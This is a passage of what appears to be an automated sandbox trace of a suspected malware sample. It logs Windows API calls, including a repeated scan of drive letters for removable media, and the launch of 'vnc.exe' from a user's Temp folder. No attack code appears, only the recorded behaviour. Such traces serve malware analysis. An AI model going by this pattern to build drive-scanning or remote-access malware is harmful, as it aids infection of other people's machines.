hHeap=0x12c0000) returned 1 [0224.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0224.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0224.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0224.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0224.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0224.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0224.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0224.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0224.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0224.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0224.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0224.193] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0224.194] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0224.194] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0224.194] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0224.194] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0224.194] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0224.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0224.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0224.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0224.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0224.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0224.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0224.194] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0224.194] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0224.194] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0224.194] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0224.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0224.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0224.195] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0224.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0224.195] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0224.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0224.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0224.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0224.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0224.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0224.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0224.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0224.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0224.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0224.195] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0224.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0224.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0224.195] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0224.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0224.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0224.196] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0224.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0224.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0224.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0224.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0224.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0224.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0224.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0224.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0224.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0224.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0224.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0224.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0224.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0224.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0224.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0224.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0224.197] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0224.197] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0224.198] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0224.205] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0224.205] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0224.205] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0224.205] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0224.205] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0224.206] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0224.206] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0224.206] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0224.207] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0224.207] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0224.207] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0224.207] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0224.207] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0224.207] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0224.208] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0224.208] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0224.208] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0224.208] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0224.208] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0224.209] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0224.209] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0224.209] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0224.209] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0224.210] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0224.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0224.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0224.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0224.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0224.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0224.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0224.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0224.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0224.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0224.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0224.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0224.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0224.210] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0224.211] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0224.211] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0224.211] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0224.211] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0224.211] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0224.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0224.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0224.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0224.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0224.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0224.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0224.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0224.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0224.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0224.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0224.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0224.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0224.212] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0224.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0224.212] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0224.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0224.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0224.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0224.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0224.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0224.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0224.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0224.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0224.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0224.212] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0224.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0224.213] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0224.213] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0224.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0224.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0224.213] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0224.213] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0224.213] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0224.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0224.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0224.213] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0224.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0224.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0224.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0224.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0224.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0224.213] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0224.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0224.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0224.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0224.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0224.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0224.213] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0224.213] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0224.214] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0224.214] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0224.214] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0224.214] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0224.214] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0224.216] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0224.216] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0224.216] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0224.216] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0224.217] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0224.218] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0224.218] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0224.218] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0224.218] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0224.218] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0224.219] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0224.219] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0224.219] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0224.219] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0224.219] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0224.220] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0224.220] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0224.220] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0224.220] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0224.220] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0224.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0224.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0224.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0224.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0224.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0224.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0224.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0224.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0224.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0224.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0224.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0224.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0224.221] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0224.221] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0224.221] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0224.221] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0224.221] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0224.221] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0224.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0224.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0224.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0224.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e40 [0224.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0224.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0224.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0224.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0224.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e40 | out: hHeap=0x12c0000) returned 1 [0224.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0224.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0224.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0224.222] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0224.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0224.222] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0224.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0224.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0224.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0224.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0224.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0224.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0224.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0224.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0224.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0224.222] PeekMessageW (lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1) Thread: id = 2 os_tid = 0x84 Thread: id = 3 os_tid = 0xe88 Thread: id = 4 os_tid = 0xe3c Thread: id = 5 os_tid = 0xe40 Thread: id = 6 os_tid = 0xe44 Thread: id = 7 os_tid = 0xc60 Thread: id = 10 os_tid = 0xd2c Thread: id = 305 os_tid = 0x130c Process: id = "2" image_name = "vnc.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\vnc.exe" page_root = "0x39dd0000" os_pid = "0xaf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xc80" cmd_line = "\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\vnc.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 618 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 619 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 620 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 621 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 622 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 623 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 624 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 625 start_va = 0xd40000 end_va = 0xda7fff monitored = 1 entry_point = 0xd41620 region_type = mapped_file name = "vnc.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\vnc.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\vnc.exe") Region: id = 626 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 627 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 